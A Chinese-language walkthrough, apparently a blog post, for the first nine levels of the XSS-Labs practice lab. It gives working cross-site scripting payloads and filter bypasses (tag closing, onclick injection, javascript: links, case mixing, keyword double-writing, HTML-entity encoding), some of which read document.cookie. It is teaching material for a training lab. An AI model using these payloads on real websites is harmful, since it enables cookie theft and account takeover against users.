XSS-Labs 第1-9关通关教程<\/h1>

第一关：无过滤<\/h2>

特点<\/strong>：没有任何过滤机制<\/p>

payload<\/strong>：<\/p>

?name=<script>alert(1)<\/script>
<\/code><\/pre>
说明<\/strong>：直接使用最基本的script标签注入即可成功。<\/p>
第二关：闭合script标签绕过<\/h2>
特点<\/strong>：输入被包含在value属性中<\/p>
测试<\/strong>：<\/p>
<script>alert(1)<\/script> 失败
<\/code><\/pre>
前端源码分析<\/strong>：需要主动闭合HTML标签，使<script><\/code>标签逃逸出来<\/p>
payload<\/strong>：<\/p>
?keyword='"><script>alert(1)<\/script>
<\/code><\/pre>
或<\/p>
"><script>alert(1)<\/script>
<\/code><\/pre>
第三关：单引号onclick事件绕过<\/h2>
特点<\/strong>：尖括号被转义，无法使用标签<\/p>
测试<\/strong>：<\/p>
<script>alert(1)<\/script> 失败
<\/code><\/pre>
源码分析<\/strong>：<\/p>

左尖括号和右尖括号被转义<\/li>
只有单引号没有被转义<\/li>
value值被单引号包含<\/li>
<\/ul>
解决方案<\/strong>：使用onclick事件弹窗<\/p>
payload<\/strong>：<\/p>
#' onclick='alert(document.cookie)
<\/code><\/pre>
说明<\/strong>：<\/p>

井号可有可无<\/li>
onclick后面的单引号与后面原先的单引号闭合<\/li>
需要点击输入框触发<\/li>
<\/ul>
第四关：双引号onclick事件绕过<\/h2>
特点<\/strong>：value值被双引号包含<\/p>
测试<\/strong>：<\/p>

单双引号都没被过滤<\/li>
value的值是被双引号包含<\/li>
<\/ul>
payload<\/strong>：<\/p>
#" onclick="alert(document.cookie)
<\/code><\/pre>
操作<\/strong>：点击输入框的#即可触发<\/p>
第五关：a标签js伪协议绕过<\/h2>
特点<\/strong>：<\/p>

script标签里的r和i之间被加上了下划线<\/li>
' " < > 都没被过滤<\/li>
onclick事件被过滤<\/li>
<\/ul>
解决方案<\/strong>：使用a标签<\/p>
payload<\/strong>：<\/p>
#"><a href=javascript:alert(1)>
<\/code><\/pre>
第六关：大小写绕过<\/h2>
特点<\/strong>：关键字被过滤但大小写敏感<\/p>
测试<\/strong>：<\/p>

确认a标签、script标签和onclick事件被过滤<\/li>
<\/ul>
payload<\/strong>：<\/p>
"><scRipt>alert(1)<\/scRipt>
<\/code><\/pre>
替代方案<\/strong>：<\/p>

href大小写：hRef<\/code><\/li>
on事件大小写：oNclick<\/code><\/li>
<\/ul>
第七关：双写绕过<\/h2>
特点<\/strong>：script关键字被过滤<\/p>
测试<\/strong>：<\/p>
<script>alert(1)<\/script> 只剩下尖括号
<\/code><\/pre>
payload<\/strong>：<\/p>
"><scscriptript>alert(1)<\/scscriptript>
<\/code><\/pre>
替代方案<\/strong>：<\/p>

a标签的href双写：hhrefref<\/code><\/li>
onclick中的on双写：oonnclick<\/code><\/li>
<\/ul>
第八关：href之unicode编码绕过<\/h2>
特点<\/strong>：输入内容被赋值给href属性<\/p>
测试<\/strong>：<\/p>

javascript:alert(1)<\/code> 被过滤<\/li>
大小写绕过无效<\/li>
<\/ul>
解决方案<\/strong>：使用unicode编码<\/p>
payload构建步骤<\/strong>：<\/p>

将javascript:alert()<\/code>转换为unicode编码<\/li>
点击友情链接触发<\/li>
<\/ol>
示例payload<\/strong>：<\/p>
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;
<\/code><\/pre>
第九关：href之unicode编码绕过（含http:\/\/检查）<\/h2>
特点<\/strong>：输入中需要包含http:\/\/<\/code><\/p>
payload构造<\/strong>：<\/p>
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;\/\/http:\/\/
<\/code><\/pre>
说明<\/strong>：<\/p>

使用unicode编码javascript部分<\/li>
最后用双斜杠隔断并添加http:\/\/满足检查条件<\/li>
点击友情链接触发<\/li>
<\/ul>
总结<\/h2>



关卡<\/th>
绕过技术<\/th>
关键payload<\/th>
<\/tr>
<\/thead>


1<\/td>
无过滤<\/td>
<script>alert(1)<\/script><\/code><\/td>
<\/tr>

2<\/td>
闭合标签<\/td>
"><script>alert(1)<\/script><\/code><\/td>
<\/tr>

3<\/td>
onclick事件<\/td>
#' onclick='alert(1)<\/code><\/td>
<\/tr>

4<\/td>
onclick事件<\/td>
#" onclick="alert(1)<\/code><\/td>
<\/tr>

5<\/td>
a标签伪协议<\/td>
"><a href=javascript:alert(1)><\/code><\/td>
<\/tr>

6<\/td>
大小写绕过<\/td>
"><scRipt>alert(1)<\/scRipt><\/code><\/td>
<\/tr>

7<\/td>
双写绕过<\/td>
"><scscriptript>alert(1)<\/scscriptript><\/code><\/td>
<\/tr>

8<\/td>
unicode编码<\/td>
javascript:alert()<\/code>的unicode编码<\/td>
<\/tr>

9<\/td>
unicode编码+http检查<\/td>
unicode编码部分\/\/http:\/\/<\/code><\/td>
<\/tr>
<\/tbody>
<\/table>
通过这9关的学习，可以掌握基本的XSS绕过技术，包括标签闭合、事件处理、编码绕过等多种方法。<\/p>

关卡<\/th>	绕过技术<\/th>	关键payload<\/th> <\/tr> <\/thead>
1<\/td>	无过滤<\/td>	`<script>alert(1)<\/script><\/code><\/td> <\/tr>`
2<\/td>	闭合标签<\/td>	`"><script>alert(1)<\/script><\/code><\/td> <\/tr>`
3<\/td>	onclick事件<\/td>	`#' onclick='alert(1)<\/code><\/td> <\/tr>`
4<\/td>	onclick事件<\/td>	`#" onclick="alert(1)<\/code><\/td> <\/tr>`
5<\/td>	a标签伪协议<\/td>	`"><a href=javascript:alert(1)><\/code><\/td> <\/tr>`
6<\/td>	大小写绕过<\/td>	`"><scRipt>alert(1)<\/scRipt><\/code><\/td> <\/tr>`
7<\/td>	双写绕过<\/td>	`"><scscriptript>alert(1)<\/scscriptript><\/code><\/td> <\/tr>`
8<\/td>	unicode编码<\/td>	`javascript:alert()<\/code>的unicode编码<\/td> <\/tr>`
9<\/td>	unicode编码+http检查<\/td>	`unicode编码部分\/\/http:\/\/<\/code><\/td> <\/tr> <\/tbody> <\/table> 通过这9关的学习，可以掌握基本的XSS绕过技术，包括标签闭合、事件处理、编码绕过等多种方法。<\/p>`